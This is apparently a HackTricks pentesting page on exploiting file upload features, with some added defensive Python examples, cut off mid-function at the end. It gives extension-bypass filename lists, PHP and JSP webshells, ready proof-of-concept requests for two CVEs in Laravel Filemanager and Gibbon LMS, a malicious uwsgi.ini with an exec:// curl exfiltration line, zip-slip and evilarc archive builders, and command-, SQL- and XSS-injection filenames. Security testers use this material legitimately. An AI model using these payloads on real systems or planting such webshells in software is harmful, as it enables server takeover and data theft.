File Upload
tip
Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the Discord group or the telegram group or follow us on Twitter @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
File Upload General Methodology
Other useful extensions:
- PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
- Working in PHPv8: .php, .php4, .php5, .phtml_, .module_, .inc, .hphp, .ctp
- ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
- Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
- Coldfusion: .cfm, .cfml, .cfc, .dbm
- Flash: .swf
- Perl: .pl, .cgi
- Erlang Yaws Web Server: .yaws
Bypass file extension checks
- If they apply, check the previous extensions. Also test them using some uppercase letters: pHp, .pHP5, .PhAr ...
- Check adding a valid extension before the execution extension (use the previous extensions too):
- file.png.php
- file.png.Php5
- Try adding special characters at the end. You could use Burp to bruteforce all the ASCII and Unicode characters. (Note that you can also try to use the previously mentioned extensions.)
- file.php%20
- file.php%0a
- file.php%00
- file.php%0d%0a
- file.php/
- file.php.\
- file.
- file.php....
- file.pHp5....
- Try to bypass the protections by tricking the server-side extension parser with techniques like doubling the extension or adding junk data (null bytes) between extensions. You can also use the previous extensions to prepare a better payload.
- file.png.php
- file.png.pHp5
- file.php#.png
- file.php%00.png
- file.php\x00.png
- file.php%0a.png
- file.php%0d%0a.png
- file.phpJunk123png
- Add another layer of extensions to the previous check:
- file.png.jpg.php
- file.php%00.png%00.jpg
- Try to put the exec extension before the valid extension and hope the server is misconfigured. (Useful to exploit Apache misconfigurations where anything with the extension .php, but not necessarily ending in .php, will execute code):
- ex: file.php.png
- Using NTFS alternate data streams (ADS) on Windows. In this case, a colon character ":" is inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension is created on the server (e.g. "file.asax:.jpg"). This file can be edited later using other techniques such as its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot after this pattern may also help to bypass further restrictions (e.g. "file.asp::$data.").
- Try to break the filename limits. The valid extension gets cut off and the malicious PHP stays. AAA<--SNIP-->AAA.php
# Linux maximum 255 bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
# Upload the file and check in the response how many characters it allows. Let's say 236
python3 -c 'print("A" * 232)'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Make the payload
AAA<--SNIP 232 A-->AAA.php.png
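As an added example that is not part of the original page, the following Python script generates the candidate filenames from the checklist above and runs them against four toy validators: a blacklist on the last extension (case-insensitive and case-sensitive variants), a "contains an allowed extension" check, and a strict allowlist. The validators, the extension sets and the stem name are assumptions made for the demonstration, not code from any product; the point is to see which checklist entries each kind of check lets through.

```python
import re

EXEC_EXTS = ("php", "php5", "phtml", "phar")
IMAGE_EXTS = ("png", "jpg", "gif")
# separators/junk from the checklist above, as the literal text a multipart
# filename would carry ("%00" is the encoded form, "\x00" the raw byte)
JUNK = ("%20", "%0a", "%00", "\x00", "%0d%0a", "/", ".\\", "....", "#", ".")


def case_variants(ext):
    """php -> php, PHP, Php, pHp"""
    return (ext, ext.upper(), ext.capitalize(), ext[0] + ext[1].upper() + ext[2:])


def bypass_candidates(stem="file"):
    """Generate the filename variants from the checklist above, deduplicated."""
    out = []
    for ext in EXEC_EXTS:
        for v in case_variants(ext):
            out.append(f"{stem}.{v}")                              # case games
            out.extend(f"{stem}.{v}{j}" for j in JUNK)             # junk at the end
            for img in IMAGE_EXTS:
                out.append(f"{stem}.{img}.{v}")                   # valid ext before exec ext
                out.append(f"{stem}.{v}.{img}")                   # exec ext before valid ext
                out.append(f"{stem}.{img}.jpg.{v}")               # another extension layer
                out.extend(f"{stem}.{v}{j}.{img}" for j in JUNK)  # junk between extensions
    return list(dict.fromkeys(out))


def blacklist_last_ext(name):
    """Reject only when the last extension (lowercased) is an exec extension."""
    return name.rsplit(".", 1)[-1].lower() not in EXEC_EXTS


def blacklist_last_ext_case_sensitive(name):
    """Same check, but it forgets to lowercase."""
    return name.rsplit(".", 1)[-1] not in EXEC_EXTS


def whitelist_substring(name):
    """Accept when an allowed extension appears anywhere in the name."""
    lowered = name.lower()
    return any(f".{img}" in lowered for img in IMAGE_EXTS)


def strict_allowlist(name):
    """Hardened: no path separators, exactly stem.ext, stem limited to
    [A-Za-z0-9_-], extension lowercase and on the allowlist."""
    if "/" in name or "\\" in name:
        return False
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([a-z0-9]{1,5})", name)
    return m is not None and m.group(1) in IMAGE_EXTS


VALIDATORS = {
    "blacklist_last_ext": blacklist_last_ext,
    "blacklist_last_ext_case_sensitive": blacklist_last_ext_case_sensitive,
    "whitelist_substring": whitelist_substring,
    "strict_allowlist": strict_allowlist,
}


def accepted_by(validator_name, names=None):
    """Return the candidates a given validator lets through."""
    names = bypass_candidates() if names is None else names
    return [n for n in names if VALIDATORS[validator_name](n)]


if __name__ == "__main__":
    for vname in VALIDATORS:
        hits = accepted_by(vname)
        print(f"{vname:36s} accepts {len(hits):3d} candidates, e.g. {hits[:3]}")
```

Run it and the three weak validators each accept dozens of candidates (the trailing-dot and %00 variants pass the last-extension blacklist, file.png.php passes the substring check, file.pHp5 passes the case-sensitive blacklist), while the allowlist accepts none of them. The allowlist is the pattern to copy server-side, ideally combined with storing the upload under a server-generated name.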
UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot), CVE-2024-21546
Some upload handlers trim or normalize trailing dots from the sanitized filename. In UniSharp's Laravel Filemanager (unisharp/laravel-filemanager) versions before 2.9.1 you can bypass the extension check by:
- Using a valid image MIME and magic header (e.g. PNG's \x89PNG\r\n\x1a\n).
- Naming the uploaded file with a PHP extension followed by a dot, e.g. shell.php. (with the trailing dot).
- The server strips the trailing dot and stores shell.php, which will be executed if it lands in a web-served directory (default public storage such as /storage/files/).
Minimal PoC (Burp Repeater):
POST /profile/avatar HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="upload"; filename="0xdf.php."
Content-Type: image/png
\x89PNG\r\n\x1a\n<?php system($_GET['cmd']??'id'); ?>
------WebKitFormBoundary--
Then request the stored path (typical for Laravel + LFM):
GET /storage/files/0xdf.php?cmd=id
Bypassing Content-Type, magic number, compression and resizing
- Bypass Content-Type checks by setting the value of the Content-Type header to: image/png, text/plain, application/octet-stream
- Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt
- Bypass magic number checks by adding at the beginning of the file the bytes of a real image (to confuse the file command). Or introduce the shell inside the metadata:
exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
or you could also introduce the payload directly into an image (note the double quotes around cmd, so the shell's single quotes are not terminated early):
echo '<?php system($_REQUEST["cmd"]); ?>' >> img.png
- If compression is being applied to your image, for example using some standard PHP libraries like PHP-GD, the previous techniques won't be useful. However, you could use the PLTE chunk technique defined here to insert text that will survive compression.
- Github with the code
- The web page could also be resizing the image, for example using the PHP-GD functions imagecopyresized or imagecopyresampled. However, you could use the IDAT chunk technique defined here to insert text that will survive compression.
- Github with the code
- Another technique to make a payload that survives image resizing, this time against the PHP Imagick function thumbnailImage: you could use the tEXt chunk technique defined here to insert text that will survive compression.
- Github with the code
Other tricks to check
- Find a vulnerability to rename the already uploaded file (to change the extension).
- Find a Local File Inclusion vulnerability to execute the backdoor.
- Possible information disclosure:
- Upload several times (and at the same time) the same file with the same name
- Upload a file with the name of a file or folder that already exists
- Upload a file with ".", "..", or "..." as its name. For instance, in Apache on Windows, if the application saves the uploaded files in the "/www/uploads/" directory, the "." filename will create a file called "uploads" in the "/www/" directory.
- Upload a file that may not be deleted easily, such as "...:.jpg" on NTFS. (Windows)
- Upload a file on Windows with invalid characters such as |<>*?" in its name. (Windows)
- Upload a file on Windows using reserved (forbidden) names such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
- Also try uploading an executable (.exe) or an .html (less suspicious) that will execute code when accidentally opened by the victim.
Special extension tricks
If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code.
If you are trying to upload files to an ASP server, take a look at the .config trick to execute code.
.phar files are like the .jar for java, but for php, and can be used like a php file (executing it with php, or including it inside a script...).
The .inc extension is sometimes used for php files that are only used to import other files, so at some point someone could have allowed this extension to be executed.
Jetty RCE
If you can upload an XML file to a Jetty server you can obtain RCE because new .xml and .war files are automatically processed. So, as shown in the following image, upload the XML file to $JETTY_BASE/webapps/ and expect the shell!
uWSGI RCE
For a detailed exploration of this vulnerability check the original research: uWSGI RCE Exploitation.
Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the .ini configuration file. uWSGI configuration files use a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, used as @(filename), is designed to include the contents of a file. Among the various schemes supported by uWSGI, the "exec" scheme is particularly potent, allowing the reading of data from a process's standard output. This feature can be abused for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is processed.
Consider the following example of a harmful uwsgi.ini file, showcasing various schemes:
[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
The payload is executed while the configuration file is parsed. For the configuration to be activated and parsed, the uWSGI process must either be restarted (potentially after a crash or due to a Denial of Service attack) or the file must be set to auto-reload. The auto-reload feature, if enabled, reloads the file at specified intervals once it detects changes.
It is crucial to understand the lax nature of uWSGI's configuration file parsing. Specifically, the payload discussed above can be inserted into a binary file (such as an image or PDF), further broadening the scope of potential exploitation.
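Added example, not part of the original page or of uWSGI itself: a small Python scanner for the @(scheme://...) placeholders shown above, intended for triaging a configuration file or an uploaded blob that uWSGI might be pointed at. The set of schemes flagged as risky and the sample inputs (the directives from the config above, and the same bytes wrapped in a fake PNG) are assumptions; the design point is to scan raw bytes rather than decoded text so the binary-embedded case from the previous paragraph is caught too.

```python
import re

# @(scheme://argument) placeholders, the syntax used in the uwsgi.ini above
MAGIC_RE = re.compile(rb"@\((?P<scheme>[a-z0-9]+)://(?P<arg>[^)]*)\)")

# schemes whose evaluation at parse time runs code or reads attacker-chosen sources
RISKY_SCHEMES = {
    b"exec": "runs a command and embeds its stdout",
    b"call": "calls a native symbol",
    b"http": "fetches a remote URL while parsing",
    b"fd": "reads from an arbitrary file descriptor",
    b"sym": "reads a binary symbol",
}


def scan_uwsgi_config(blob):
    """Scan raw bytes (a .ini, or any uploaded file uWSGI could be pointed at) for
    @(scheme://...) placeholders. Returns [(line_no, scheme, argument, risky)].
    Bytes on purpose: the lenient parser honours these inside binaries as well."""
    findings = []
    for line_no, line in enumerate(blob.splitlines(), start=1):
        if line.lstrip().startswith((b";", b"#")):
            continue                                  # ini comments are never evaluated
        for m in MAGIC_RE.finditer(line):
            scheme = m.group("scheme")
            findings.append((line_no, scheme.decode("ascii"),
                             m.group("arg").decode("latin-1"), scheme in RISKY_SCHEMES))
    return findings


def risky_only(blob):
    """Just the findings that warrant an alert."""
    return [f for f in scan_uwsgi_config(blob) if f[3]]


# constructed samples: directives from the config above, and the same bytes
# wrapped in a fake PNG to show that embedding them in a binary does not hide them
SAMPLE_INI = b"""[uwsgi]
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
characters = @(call://uwsgi_func)
banner = @(file://./banner.txt)
"""
SAMPLE_PNG_WITH_INI = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32 + SAMPLE_INI + b"\xff" * 16

if __name__ == "__main__":
    for source, blob in (("uwsgi.ini", SAMPLE_INI), ("avatar.png", SAMPLE_PNG_WITH_INI)):
        for line_no, scheme, arg, risky in scan_uwsgi_config(blob):
            print(f"{source}:{line_no}: {'RISKY' if risky else 'ok   '} @({scheme}://{arg})")
```

On a live host the same scan belongs on every file uWSGI is configured to read, and on anything an upload feature can write into a path uWSGI later loads; a hit on exec:// or call:// in an "image" is a concrete indicator of the embedding trick described above.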
Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)
An unauthenticated endpoint in Gibbon LMS allows arbitrary file writes inside the web root, leading to pre-auth RCE by dropping PHP files. Vulnerable versions: up to and including 25.0.01.
- Endpoint: /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php
- Method: POST
- Required params:
- img: a data-URI-like string [mime];[name],[base64] (the server ignores type/name and base64-decodes the last part)
- path: destination filename relative to the Gibbon install dir (e.g. poc.php or 0xdf.php)
- gibbonPersonID: any non-empty value is accepted (e.g. 0000000001)
Minimal PoC to write and read back a file:
# Prepare test payload
printf '0xdf was here!\n' | base64
# => MHhkZiB3YXMgaGVyZSEK
# Write poc.php via unauth POST
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;test,MHhkZiB3YXMgaGVyZSEK&path=poc.php&gibbonPersonID=0000000001'
# Verify write
curl http://target/Gibbon-LMS/poc.php
Drop a minimal webshell and run commands:
# '<?php system($_GET["cmd"]); ?>' base64
# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;foo,PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==&path=shell.php&gibbonPersonID=0000000001'
curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'
Notes:
- The handler performs base64_decode($_POST["img"]) after splitting on ; and , and then writes the bytes to $absolutePath . '/' . $_POST['path'] without validating extension/type.
- The resulting code runs as the web service user (e.g. XAMPP Apache on Windows).
References for this bug include the usd HeroLab advisory and the NVD record. See the References section below.
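Added example, not Gibbon's code: a Python model of the handler as the notes describe it (split the data URI, base64-decode the last part, join the install dir with the client path, write), beside a hardened version. The install directory, the MIME allowlist and the magic-byte table are assumptions; the sample payloads are the ones from the PoC above plus a constructed PNG header. Nothing is written to disk; both functions return the destination path and the bytes so the difference is visible.

```python
import base64
import binascii
import os

INSTALL_DIR = "/var/www/html/Gibbon-LMS"       # assumed value of $absolutePath
ALLOWED_MIME = {"image/png": ".png", "image/jpeg": ".jpg"}
MAGIC = {"image/png": b"\x89PNG\r\n\x1a\n", "image/jpeg": b"\xff\xd8\xff"}


def parse_data_uri(img):
    """'[mime];[name],[base64]' -> (mime, name, decoded bytes). The base64 is
    whatever follows the last comma, mirroring the split-then-decode in the notes."""
    head, _, b64 = img.rpartition(",")
    mime, _, name = head.partition(";")
    return mime, name, base64.b64decode(b64)


def vulnerable_write(img, path, install_dir=INSTALL_DIR):
    """The bug as described: decode, join install_dir/path, write. No check on
    type, extension or where the path points. Returns (dest, data) instead of writing."""
    _, _, data = parse_data_uri(img)
    return os.path.join(install_dir, path), data


def hardened_write(img, path, install_dir=INSTALL_DIR, upload_dir="uploads"):
    """Allow-listed MIME, strict base64, magic bytes matching the declared type,
    a server-chosen extension, and a canonicalized destination inside upload_dir.
    Returns (dest, data) on success or (None, reason) on rejection."""
    head, sep, b64 = img.rpartition(",")
    mime = head.partition(";")[0]
    if not sep or mime not in ALLOWED_MIME:
        return None, "mime not allowed"
    try:
        data = base64.b64decode(b64, validate=True)
    except binascii.Error:
        return None, "bad base64"
    if not data.startswith(MAGIC[mime]):
        return None, "content does not match declared type"
    # keep only the stem of the client name: directories and extension are ours to choose
    stem = os.path.splitext(os.path.basename(path))[0]
    if not (stem and stem.isalnum()):
        return None, "bad filename"
    base = os.path.normpath(os.path.join(install_dir, upload_dir))
    dest = os.path.normpath(os.path.join(base, stem + ALLOWED_MIME[mime]))
    # defence in depth: verify containment even for a rebuilt name
    # (use os.path.realpath on a live system so symlinks are resolved too)
    if os.path.commonpath([base, dest]) != base:
        return None, "path escapes upload dir"
    return dest, data


# constructed request values: the PoC strings from above, plus a real PNG header
SAMPLE_PNG = MAGIC["image/png"] + b"\x00" * 8
SAMPLE_PNG_B64 = base64.b64encode(SAMPLE_PNG).decode()
GOOD_IMG = "image/png;avatar," + SAMPLE_PNG_B64
POC_TEXT = "image/png;test,MHhkZiB3YXMgaGVyZSEK"
POC_SHELL = "image/png;foo,PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg=="

if __name__ == "__main__":
    print(vulnerable_write(POC_SHELL, "shell.php"))
    print(vulnerable_write(POC_SHELL, "../../tmp/shell.php"))
    print(hardened_write(POC_SHELL, "shell.php"))
    print(hardened_write(GOOD_IMG, "../../../avatar.php"))
```

The vulnerable model accepts a PHP body under any name and even lets path climb out of the install directory; the hardened one rejects the webshell on content, and turns ../../../avatar.php into uploads/avatar.png because the extension and directory are chosen by the server, never by the request.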
wget File Upload/SSRF Trick
On some occasions you may find that a server is using wget to download files and you can indicate the URL. In these cases, the code may be checking that the extension of the downloaded file is inside a whitelist to ensure that only allowed files are downloaded. However, this check can be bypassed.
The maximum length of a filename on Linux is 255 characters; however, wget truncates filenames to 236 characters. You can download a file called "A"*232+".php"+".gif"; this filename will bypass the check (as in this example ".gif" is a valid extension) but wget will rename the file to "A"*232+".php".
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080
#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06-- http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>] 10 --.-KB/s in 0s
2020-06-13 03:14:06 (1.96 MB/s) - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php' saved [10/10]
Note that another option you may think of to bypass this check is to make the HTTP server redirect to a different file, so the initial URL passes the check and then wget downloads the redirected file under the new name. This won't work unless wget is used with the parameter --trust-server-names, because wget will download the redirected page with the name of the file indicated in the original URL.
Escaping the upload directory via NTFS junctions (Windows)
(For this attack you will need local access to the Windows machine.) When uploads are stored under per-user subfolders on Windows (e.g. C:\Windows\Tasks\Uploads\<id>) and you control the creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g. the webroot). Subsequent uploads are then written to the target path, allowing code execution if the target interprets server-side code.
Example flow to redirect uploads into XAMPP webroot:
:: 1) Upload once to learn/confirm your per-user folder name (e.g., md5 of form fields)
:: Observe it on disk: C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
:: 2) Remove the created folder and create a junction to webroot
rmdir C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
cmd /c mklink /J C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882 C:\xampp\htdocs
:: 3) Re-upload your payload; it lands under C:\xampp\htdocs
:: Minimal PHP webshell for testing
:: <?php echo shell_exec($_REQUEST['cmd']); ?>
:: 4) Trigger
curl "http://TARGET/shell.php?cmd=whoami"
Notes
- mklink /J creates an NTFS directory junction (reparse point). The web server account must be able to follow the junction and have write permission on the target location.
- This redirects arbitrary file writes; if the target location executes scripts (PHP/ASP), it turns into RCE.
- Defence: don't let writable upload roots be attacker-controllable under C:\Windows\Tasks or similar; block junction creation; validate extensions server-side; store uploads on a separate volume or with deny-execute ACLs.
GZIP-compressed body upload + path traversal in destination param -> JSP webshell RCE (Tomcat)
Some upload/ingest handlers write the raw request body to a filesystem path built from user-controlled query parameters. If the handler also supports Content-Encoding: gzip and fails to canonicalize/validate the destination path, you can combine directory traversal with a gzipped payload to write arbitrary bytes into a web-served directory and get RCE (e.g. drop a JSP under Tomcat's webapps).
Generic exploitation flow:
- Prepare your server-side payload (e.g. a minimal JSP webshell) and gzip-compress the bytes.
- Send a POST where the path parameter (e.g. token) contains traversal that escapes the intended folder, and file indicates the filename to store. Set Content-Type: application/octet-stream and Content-Encoding: gzip; the body is the compressed payload.
- Browse to the written file to trigger execution.
Illustrative request:
POST /fileupload?token=..%2f..%2f..%2f..%2fopt%2ftomcat%2fwebapps%2fROOT%2Fjsp%2F&file=shell.jsp HTTP/1.1
Host: target
Content-Type: application/octet-stream
Content-Encoding: gzip
Content-Length: <len>
<gzip-compressed-bytes-of-your-jsp>
Then trigger it:
GET /jsp/shell.jsp?cmd=id HTTP/1.1
Host: target
Notes
- Target paths vary by installation (e.g. /opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/ in some stacks). Any web-served folder that executes JSP will work.
- Burp Suite's Hackvertor extension can build a correct gzip body from your payload.
- This is a pre-auth arbitrary file write -> RCE pattern; it does not depend on multipart parsing.
Mitigations
- Determine upload destinations server-side; do not trust path fragments coming from clients.
- Canonicalize the path and enforce that the resolved path stays within an allow-listed base directory.
- Store uploads on a non-executable volume and strip script execution from writable paths.
Tools
- Upload Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
Corrupting upload indices with snprintf quirks (historical)
Some legacy upload handlers that use snprintf() or similar to build multi-file arrays from a single-file upload can be tricked into forging the _FILES structure. Because of inconsistencies and truncation in snprintf() behaviour, a carefully crafted single upload can appear as multiple indexed files on the server side, confusing logic that assumes a strict shape (e.g. treating it as a multi-file upload and taking unsafe branches). While niche today, this "index corruption" pattern occasionally resurfaces in CTFs and legacy codebases.
From File upload to other vulnerabilities
- Set the filename to ../../../tmp/lol.png and try to achieve a path traversal
- Set the filename to sleep(10)-- -.jpg and you may be able to achieve a SQL injection
- Set the filename to <svg onload=alert(document.domain)> to achieve a XSS
- Set the filename to ; sleep 10; to try some command injection (more command injection tricks here)
- XSS in image (svg) file upload
- JS file upload + XSS = Service Workers exploitation
- XXE in svg upload
- Open Redirect via uploading svg file
- Try different svg payloads from https://github.com/allanlw/svg-cheatsheet
- Famous ImageTrick vulnerability
- If you can make the web server fetch an image from a URL you could try to abuse an SSRF. If this image is going to be saved on some public site, you could also indicate a URL from https://iplogger.org/invisible/ and steal information of every visitor.
- XXE and CORS bypass with PDF-Adobe upload
- Specially crafted PDFs to XSS: The following page presents how to inject PDF data to obtain JS execution. If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
- Upload the [eicar](https://secure.eicar.org/eicar.com.txt) content to check if the server has any antivirus
- Check if there is any size limit when uploading files
Here's a top 10 list of things that you can achieve by uploading (from here):
- ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
- SVG: Stored XSS / SSRF / XXE
- GIF: Stored XSS / SSRF
- CSV: CSV injection
- XML: XXE
- AVI: LFI / SSRF
- HTML / JS : HTML injection / XSS / Open redirect
- PNG / JPEG: Pixel flood attack (DoS)
- ZIP: RCE via LFI / DoS
- PDF / PPTX: SSRF / BLIND XXE
Burp Extension
GitHub - PortSwigger/upload-scanner: HTTP file upload scanner for Burp Proxy
Magic Header Bytes
- PNG: "\x89PNG\r\n\x1a\n" (the 8-byte signature; the IHDR chunk follows it)
- JPG:
"\xff\xd8\xff"
Refer to https://en.wikipedia.org/wiki/List_of_file_signatures for other filetypes.
Zip/Tar file automatically decompressed upload
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
Symlink
Upload an archive containing soft links to other files; then, accessing the decompressed files you will access the linked files:
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
Decompress in different folders
The unexpected creation of files in directories during decompression is a significant issue. Despite initial assumptions that this setup might guard against OS-level command execution through malicious file uploads, the hierarchical compression support and directory traversal capabilities of the ZIP archive format can be exploited. This allows attackers to bypass restrictions and escape secure upload directories by manipulating the decompression functionality of the targeted application.
An automated exploit to craft such files is available at evilarc on GitHub. The utility can be used as shown:
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
Additionally, the symlink trick with evilarc is an option. If the objective is to target a file like /flag.txt, a symlink to that file should be created on your system. This ensures that evilarc does not encounter errors during its operation.
Below is an example of Python code used to create a malicious zip file:
#!/usr/bin/env python3
import zipfile
from io import BytesIO

def create_zip():
    f = BytesIO()
    # the member name carries the traversal; it is applied relative to wherever the server unzips
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
    z.writestr('otherfile.xml', 'Content of the file')
    z.close()
    with open('poc.zip', 'wb') as out:
        out.write(f.getvalue())

create_zip()
Abusing compression for file spraying
For further details check the original post at: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/
- Creating a PHP Shell: PHP code is written to execute commands passed through the $_REQUEST variable.
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>
- File Spraying and Compressed File Creation: Multiple files are created and a zip archive is assembled containing these files.
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
- Modification with a Hex Editor or vi: The names of the files inside the zip are altered using vi or a hex editor, changing "xxA" to "../" to traverse directories.
:set modifiable
:%s/xxA/../g
:x!
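Added example, not part of the original page or of evilarc: a Python audit of archive members before extraction that flags the traversal names the evilarc and file-spraying archives above carry, absolute paths, symlink members like the symindex.txt trick, and anything whose canonical path leaves the destination. The build_archive helper only constructs test input (it stores symlinks the way zip --symlinks does); the destination paths are assumptions.

```python
import io
import os
import posixpath
import stat
import zipfile


def build_archive(files, symlinks=None):
    """Constructed test input: regular members plus optional symlink members
    (S_IFLNK in the external attributes, link target as the member body)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in files.items():
            z.writestr(name, data)
        for name, target in (symlinks or {}).items():
            info = zipfile.ZipInfo(name)
            info.external_attr = (stat.S_IFLNK | 0o777) << 16
            z.writestr(info, target)
    return buf.getvalue()


def classify_member(info, dest):
    """Return None if the member is safe to extract under dest, else the reason."""
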